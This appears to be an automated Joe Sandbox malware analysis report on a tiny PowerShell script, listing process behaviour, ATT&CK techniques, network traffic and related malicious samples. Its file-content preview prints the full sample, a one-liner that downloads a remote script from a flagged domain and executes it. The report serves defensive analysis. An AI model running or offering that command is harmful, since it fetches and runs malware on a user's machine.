Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5141Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4674Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -18446744073709540s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000001.00000002.1260378056.000000000700E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllng
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\0J5R54fzDJ.ps1 VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631899 Sample: 0J5R54fzDJ.ps1 Startdate: 07/03/2025 Architecture: WINDOWS Score: 52 14 cf-prod-cap.cfd 2->14 18 Antivirus detection for URL or domain 2->18 20 Joe Sandbox ML detected suspicious sample 2->20 7 powershell.exe 15 19 2->7         started        10 notepad.exe 2->10         started        signatures3 process4 dnsIp5 16 cf-prod-cap.cfd 188.114.96.3, 443, 49715 CLOUDFLARENETUS European Union 7->16 12 conhost.exe 7->12         started        process6

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
0J5R54fzDJ.ps10%VirustotalBrowse
0J5R54fzDJ.ps10%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://cf-prod-cap.cfd/cf_verif.ps1100%Avira URL Cloudmalware
https://cf-prod-cap.cfd0%Avira URL Cloudsafe
http://cf-prod-cap.cfd0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
cf-prod-cap.cfd
188.114.96.3
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://cf-prod-cap.cfd/cf_verif.ps1false
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://www.cloudflare.com/learning/access-management/phishing-attack/powershell.exe, 00000001.00000002.1252372611.0000000004CED000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1256339197.0000000005999000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://crl.micropowershell.exe, 00000001.00000002.1260978683.00000000070C8000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1252372611.0000000004A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1260378056.000000000700E000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1252372611.0000000004931000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1252372611.0000000004A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1260378056.000000000700E000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://go.micropowershell.exe, 00000001.00000002.1252372611.0000000004EA8000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/powershell.exe, 00000001.00000002.1256339197.0000000005999000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1256339197.0000000005999000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.1256339197.0000000005999000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 00000001.00000002.1256339197.0000000005999000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://cf-prod-cap.cfdpowershell.exe, 00000001.00000002.1252372611.0000000004CC7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cf-prod-cap.cfdpowershell.exe, 00000001.00000002.1252372611.0000000004B4E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1252372611.0000000004931000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1252372611.0000000004A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1260378056.000000000700E000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000001.00000002.1252372611.0000000004CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1252372611.0000000004CE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                188.114.96.3
                                cf-prod-cap.cfdEuropean Union
                                13335CLOUDFLARENETUSfalse
                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1631899
                                Start date and time:2025-03-07 17:06:45 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 29s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:13
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:0J5R54fzDJ.ps1
                                renamed because original name is a hash value
                                Original Sample Name:df2ffecdfecc6eec6cbb8f28d193257c99cf22a9204a95f2a6b7d4ca3504276d.ps1
                                Detection:MAL
                                Classification:mal52.winPS1@3/5@1/1
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 9
                                • Number of non-executed functions: 5
                                Cookbook Comments:
                                • Found application associated with file extension: .ps1
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 23.199.214.10
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 7364 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                TimeTypeDescription
                                11:07:46API Interceptor31x Sleep call for process: powershell.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                188.114.96.3CjbMEPJZ3J.exeGet hashmaliciousFormBookBrowse
                                • www.marposet.shop/kexu/?bnb=vB2aylf3Q2XahtdhLosDE8imHxT8gnaOyIU1/x/DWtHmRdE433nBd+fkpXIkCpVdFXbAQIB1mNsJnhcAO1C9KkO96rRwixvsUK4o5J4zTNrClVAPCw==&8v4Hv=cpKH3h
                                Ccp3sJPDXs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • asdff123fsdafasdf.ru/packetLowGeoProtectCentral.php
                                justificante de transferencia09454545.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • www.kdjsswzx.club/myab/?MP=NdxOYJDJG4lm+JEaKG3C3Lbnwt5J/jX7V01w+cJuJBraytzWaHOc0QEGm1yXIwrAoNttsMOQwUptf8Glw1EAh4LN1ggO1axYIhZB7gb+MpY69764OA==&vv=hBodit
                                Shipping Document.exeGet hashmaliciousFormBookBrowse
                                • www.fkrvhaupjtc.info/2p9f/
                                RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeGet hashmaliciousFormBookBrowse
                                • www.timeinsardinia.info/50g8/
                                https://regcompany.marrkone.com/ssddcw/e095cdfe/?aef2d=cmFsaUBiYW5lc2NvdXNhLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                • login.marrkone.com/4c8979e070?nxx=dccfc2c7eecccfc0cbddcdc1dbddcf80cdc1c3accdcf
                                FRQ 101102-04-25-0948-015.exeGet hashmaliciousFormBookBrowse
                                • www.tether1.xyz/focp/
                                http://uploads-ssl.webflow.com/660018002a32edee7a11d41b/66335b965a5a96f03bd82400_kasuwidavogog.pdfGet hashmaliciousUnknownBrowse
                                • melurilexuki.urseghy.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=91706aaa4ac64204
                                http://netflix-official.com/e/authID=ek3LfGet hashmaliciousUnknownBrowse
                                • netflix-official.com/e/img/nficon2016.ico
                                PAYMENT SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                • www.fkrvhaupjtc.info/2p9f/
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUSZTEIhNCtP3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 104.21.64.1
                                phish_alert_sp2_2.0.0.0-1.emlGet hashmaliciousHTMLPhisherBrowse
                                • 1.1.1.1
                                #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exeGet hashmaliciousLummaC StealerBrowse
                                • 104.21.89.159
                                LE2dyDn347.exeGet hashmaliciousGuLoaderBrowse
                                • 104.21.64.1
                                xtQdwMwu86.exeGet hashmaliciousFormBookBrowse
                                • 172.67.180.97
                                A2h6QhZIKx.exeGet hashmaliciousAzorultBrowse
                                • 104.21.96.1
                                #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exeGet hashmaliciousLummaC StealerBrowse
                                • 172.67.189.153
                                #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exeGet hashmaliciousLummaC StealerBrowse
                                • 104.21.89.159
                                uPDwUy9ewY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 104.21.80.1
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0eUpdate.exeGet hashmaliciousUnknownBrowse
                                • 188.114.96.3
                                Update.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                • 188.114.96.3
                                X227lrtOTJ.exeGet hashmaliciousGhostRat, ValleyRATBrowse
                                • 188.114.96.3
                                Update.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                • 188.114.96.3
                                ZTEIhNCtP3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 188.114.96.3
                                uPDwUy9ewY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 188.114.96.3
                                OeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 188.114.96.3
                                EYv5BQ5NjI.exeGet hashmaliciousUnknownBrowse
                                • 188.114.96.3
                                UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 188.114.96.3
                                x8ggp1u7V8.exeGet hashmaliciousAgentTeslaBrowse
                                • 188.114.96.3
                                No context
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1510207563435464
                                Encrypted:false
                                SSDEEP:3:Nlllullkv/tz:NllU+v/
                                MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................................@..........
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6221
                                Entropy (8bit):3.7297874803912188
                                Encrypted:false
                                SSDEEP:96:fMoz3Cl+57kvhkvCCtPuW5LBHZTW5LBHZg:fMo+2/PuW5LnTW5Lng
                                MD5:D302A77C4BF12C3E219E452816941499
                                SHA1:B5F1EF766998082E7C0D363B271462D7A66FCAAB
                                SHA-256:7549BC6E5869241946F521DCA4A5E2A340517AA603C337BCACF26E2508483C3D
                                SHA-512:022C93D677BFDF65DCE860D93C1E8CA60A17D9624591AD4245AEB68D5FB7550BACA0D467DFE9CABCB8190CF6C90662B4F7D0FE7770218581FC4FF55FD3113196
                                Malicious:false
                                Reputation:low
                                Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v........{.....K.{.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^gZ............................%..A.p.p.D.a.t.a...B.V.1.....gZ...Roaming.@......CW.^gZ...........................nX..R.o.a.m.i.n.g.....\.1.....gZ.T..MICROS~1..D......CW.^gZ.T..........................pr1.M.i.c.r.o.s.o.f.t.....V.1.....gZ;T..Windows.@......CW.^gZ;T..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^gZ.T....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^gZ.T....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^gZaS..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6221
                                Entropy (8bit):3.7297874803912188
                                Encrypted:false
                                SSDEEP:96:fMoz3Cl+57kvhkvCCtPuW5LBHZTW5LBHZg:fMo+2/PuW5LnTW5Lng
                                MD5:D302A77C4BF12C3E219E452816941499
                                SHA1:B5F1EF766998082E7C0D363B271462D7A66FCAAB
                                SHA-256:7549BC6E5869241946F521DCA4A5E2A340517AA603C337BCACF26E2508483C3D
                                SHA-512:022C93D677BFDF65DCE860D93C1E8CA60A17D9624591AD4245AEB68D5FB7550BACA0D467DFE9CABCB8190CF6C90662B4F7D0FE7770218581FC4FF55FD3113196
                                Malicious:false
                                Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v........{.....K.{.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^gZ............................%..A.p.p.D.a.t.a...B.V.1.....gZ...Roaming.@......CW.^gZ...........................nX..R.o.a.m.i.n.g.....\.1.....gZ.T..MICROS~1..D......CW.^gZ.T..........................pr1.M.i.c.r.o.s.o.f.t.....V.1.....gZ;T..Windows.@......CW.^gZ;T..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^gZ.T....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^gZ.T....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^gZaS..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                File type:ASCII text
                                Entropy (8bit):4.3873736406985255
                                TrID:
                                  File name:0J5R54fzDJ.ps1
                                  File size:46 bytes
                                  MD5:add1b58cd122ee7a1807d8634099b1f2
                                  SHA1:0b9e55fdf1906c81f367afbcb8efac8a526e089c
                                  SHA256:df2ffecdfecc6eec6cbb8f28d193257c99cf22a9204a95f2a6b7d4ca3504276d
                                  SHA512:412a24c206a1eedb8b15bad330306bbb8f5f23df66a53da231aca836f8ec684729f655d05c2c3f94f5f101ee7a2a74b8da6f7f2f01772ffe0dea8182d5a26a07
                                  SSDEEP:3:WIuGRahU2DLVWUFTt:WIuGRUnDAUFTt
                                  TLSH:
                                  File Content Preview:irm https://cf-prod-cap.cfd/cf_verif.ps1 |iex.
                                  Icon Hash:3270d6baae77db44
                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2025-03-07T17:07:50.123089+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449715188.114.96.3443TCP
                                  TimestampSource PortDest PortSource IPDest IP
                                  Mar 7, 2025 17:07:47.266535044 CET49715443192.168.2.4188.114.96.3
                                  Mar 7, 2025 17:07:47.266571999 CET44349715188.114.96.3192.168.2.4
                                  Mar 7, 2025 17:07:47.266635895 CET49715443192.168.2.4188.114.96.3
                                  Mar 7, 2025 17:07:47.279020071 CET49715443192.168.2.4188.114.96.3
                                  Mar 7, 2025 17:07:47.279037952 CET44349715188.114.96.3192.168.2.4
                                  Mar 7, 2025 17:07:49.570378065 CET44349715188.114.96.3192.168.2.4
                                  Mar 7, 2025 17:07:49.570457935 CET49715443192.168.2.4188.114.96.3
                                  Mar 7, 2025 17:07:49.576045036 CET49715443192.168.2.4188.114.96.3
                                  Mar 7, 2025 17:07:49.576083899 CET44349715188.114.96.3192.168.2.4
                                  Mar 7, 2025 17:07:49.576404095 CET44349715188.114.96.3192.168.2.4
                                  Mar 7, 2025 17:07:49.593125105 CET49715443192.168.2.4188.114.96.3
                                  Mar 7, 2025 17:07:49.640336990 CET44349715188.114.96.3192.168.2.4
                                  Mar 7, 2025 17:07:50.123097897 CET44349715188.114.96.3192.168.2.4
                                  Mar 7, 2025 17:07:50.135946989 CET44349715188.114.96.3192.168.2.4
                                  Mar 7, 2025 17:07:50.135977030 CET44349715188.114.96.3192.168.2.4
                                  Mar 7, 2025 17:07:50.136008978 CET49715443192.168.2.4188.114.96.3
                                  Mar 7, 2025 17:07:50.136025906 CET44349715188.114.96.3192.168.2.4
                                  Mar 7, 2025 17:07:50.136074066 CET49715443192.168.2.4188.114.96.3
                                  Mar 7, 2025 17:07:50.139240980 CET44349715188.114.96.3192.168.2.4
                                  Mar 7, 2025 17:07:50.139348030 CET44349715188.114.96.3192.168.2.4
                                  Mar 7, 2025 17:07:50.139486074 CET49715443192.168.2.4188.114.96.3
                                  Mar 7, 2025 17:07:50.142606974 CET49715443192.168.2.4188.114.96.3
                                  TimestampSource PortDest PortSource IPDest IP
                                  Mar 7, 2025 17:07:47.226272106 CET5198053192.168.2.41.1.1.1
                                  Mar 7, 2025 17:07:47.257976055 CET53519801.1.1.1192.168.2.4
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Mar 7, 2025 17:07:47.226272106 CET192.168.2.41.1.1.10x2141Standard query (0)cf-prod-cap.cfdA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
